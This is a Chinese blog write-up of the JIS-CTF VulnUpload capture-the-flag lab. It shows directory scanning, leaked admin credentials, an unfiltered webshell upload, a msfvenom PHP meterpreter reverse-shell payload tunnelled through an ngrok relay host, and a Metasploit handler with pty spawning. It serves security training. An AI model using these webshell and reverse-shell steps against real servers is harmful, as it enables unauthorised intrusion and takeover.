记录JIS-CTF: VulnUpload解题过程

JIS-CTF: VULNUPLOAD

说明:我的环境是搭建在公网上的,如果是搭建在自己虚拟机的话实际操作并没有下面我写的那么复杂。

一、Flag_1

1.起初以为是sql注入,后来发现不是,没办法,拿御剑扫一波,竟然有意外收获

访问  http://xxx.xxx.xx.xxx:8889/flag 即可得到flag_1

二、Flag_2

1.在http://xxx.xxx.xxx.xxx:8889/robots.txt 中发现还有其他页面,其中只有 http://xxx.xxx.xxx.xxx:8889/admin_area/ 有东西

 

2.查看网页源代码得到flag_2,同时得到登录账号username:admin password:3v1l_H@ck3r

​ 

三、Flag_3

1.登录进来发现是文件上传,这里上传一句话木马即可,没有任何的过滤

2.从之前的robots.txt中可以推出上传路径为 http://xxx.xxx.xxx.xxx:8889/uploaded_files/ ,使用蚁剑连接即可

3.在终端模糊查询flag,找到flag.txt

4.但是flag.txt访问之后并没有回显出东西,但是在同目录下的 hint.txt中找到了flag_3

四、Flag_4

1. 这里提示查找 technawi 用户来读取flag.txt

使用如下命令查找有关 techhnawi 用户的文件:

find / -user 'technawi' 2>/dev/null

/etc/mysql/conf.d/credentials.txt 文件中找到flag_4

五、Flag_5

1.这里提供了technawi 的密码,根据之前的提示,很显然我们需要登录 technawi 这个用户,此时蚁剑已经不能满足需求了,我们直接上kali。

因为环境是搭建在公网上的,我们kali机在内网,所以需要进行内网穿透,首先在ngrok上搭建一个ftp服务,如下:

Ngrok官网:https://www.ngrok.cc/

2.打开服务

./sunny clientid 隧道id

3.生成一个webhell,种类很多,这里选择php,生成之后把这个shell上传

msfvenom  -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw > qwer.php

注:生成的webshell在当前目录下

4.对qwer.php修改ip和端口(ip和端口是Ngrok提供的ip和端口

ip: free.idcfengye.com

端口: xxxx

5.打开msf,输入以下payload,

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 80

run

6.访问我们上传的shell:http://xxx.xxx.xxx.xxx:8889/uploaded_files/qwer.php,然后run

输入以下命令:

shell

python -c "import pty;pty.spawn('/bin/bash')"

7.这时候我们就可以登录 technawi 了

Linux切换用户命令:su 用户名

8.进入/var/www/html 读取flag.txt即可得到flag_5

参考文章:

JIS-CTF解题思路及关键语句_花纵酒的博客-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值